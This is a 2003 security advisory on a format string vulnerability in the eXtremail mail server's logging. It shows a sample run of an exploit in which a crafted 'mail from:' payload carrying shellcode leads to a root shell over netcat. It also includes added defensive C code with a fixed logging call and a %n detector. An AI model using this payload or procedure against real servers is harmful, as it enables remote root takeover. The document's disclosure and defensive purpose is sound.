
eXtremail.txt
Posted Jul 7, 2003
Authored by B-r00t

Linux eXtremail versions 1.5-8 and below contain a format string vulnerability in the logging mechanism. Exploiting it can allow arbitrary code execution or a denial of service on the server.

tags | advisory, denial of service, arbitrary, code execution
systems | linux
SHA-256 | 9f300aec91de3f79ec8ad7dea040e62aded97cd4340b3ea05a7067bc03e93163

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1








Remote Vulnerabilities in eXtremail Server.
===========================================

Date: 02.07.2003
Email: B-r00t <br00t@blueyonder.co.uk>

Reference: http://www.extremail.com/
Versions: Linux eXtremail-1.5-8 => VULNERABLE
          Linux eXtremail-1.5-5 => VULNERABLE

Exploit: eXtreme.c

eXtremail is a Unix mail server, providing SMTP (port 25), POP3 (port 110)
and IMAP (port 143) services. The latest versions are still vulnerable to
the format string vulnerabilities discovered previously.

http://www.securityfocus.com/bid/2908/info/

eXtremail contains a format string vulnerability in its logging
mechanism. Users can send SMTP commands with maliciously constructed
arguments that exploit this vulnerability.
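
An added illustration, not eXtremail's code and not part of the original advisory: the fix for this class of logging bug, plus a check for memory-writing printf directives in an SMTP argument. The names log_line, log_smtp_command and has_write_directive are hypothetical; the server's real logging routine is not shown on this page.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logger standing in for the server's logging routine.
 * The format attribute (GCC/Clang) lets -Wformat -Wformat-security flag
 * call sites whose format argument is not a string literal. */
__attribute__((format(printf, 3, 4)))
static int log_line(char *buf, size_t len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, len, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern: log_line(buf, len, smtp_arg), where client bytes
 * become the format string. Fixed form: constant format, client bytes
 * passed only as "%s" data. */
int log_smtp_command(char *buf, size_t len, const char *verb,
                     const char *smtp_arg)
{
    return log_line(buf, len, "SMTP %s: %s", verb, smtp_arg);
}

/* Detection aid for logs or an SMTP proxy: returns 1 if s contains a
 * printf conversion that writes memory (%n, %hn, positional %44$n),
 * else 0. "%%" is a literal percent sign and is skipped. */
int has_write_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')
            continue;
        /* Skip flags, width, precision, positional index, length modifiers. */
        while (*s && strchr("0123456789$.*-+ #'hlLqjzt", *s))
            s++;
        if (*s == 'n')
            return 1;
        if (*s == '\0')
            break;
    }
    return 0;
}
```

With the constant format string the directives in the argument are written to the log as literal text, which also leaves them visible to has_write_directive during log review.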

eXtremail runs with root privileges. By exploiting this vulnerability,
remote attackers can gain superuser access on the underlying host. It is
also possible to crash eXtremail. If it is not restarted automatically, a
denial of SMTP service will result.

These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10',
however they seem to have re-emerged in the latest versions.

Attached exploit [eXtreme.c] for latest versions of eXtremail.

$ gcc -o eXtreme eXtreme.c

$ ./eXtreme

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2

0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3 eXtremail V1.5 DEBUG

On success a r00tshell will be spawned on port 36864.






$ ./eXtreme 192.168.0.50 2

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Connected to 192.168.0.50
Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send: HELO Br00t~R0x~Y3r~W0rld!
Recv: 250 Hi, I am localdomain

System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy: 0xbefff0c8
RET (shellcode): 0xbefff1d4
PAD (alignment): 1
Payload: 254 / 266 max bytes
Sending it ...
Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@
F@ /bin/shCf Vf VfC?)?A?AV v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!

Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux



- --

B#.
- ----------------------------------------------------
Email : B-r00t <br00t@blueyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------







-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39
HBOcgtG6P1BPhcxYzG/AoAM=
=GHV2
-----END PGP SIGNATURE-----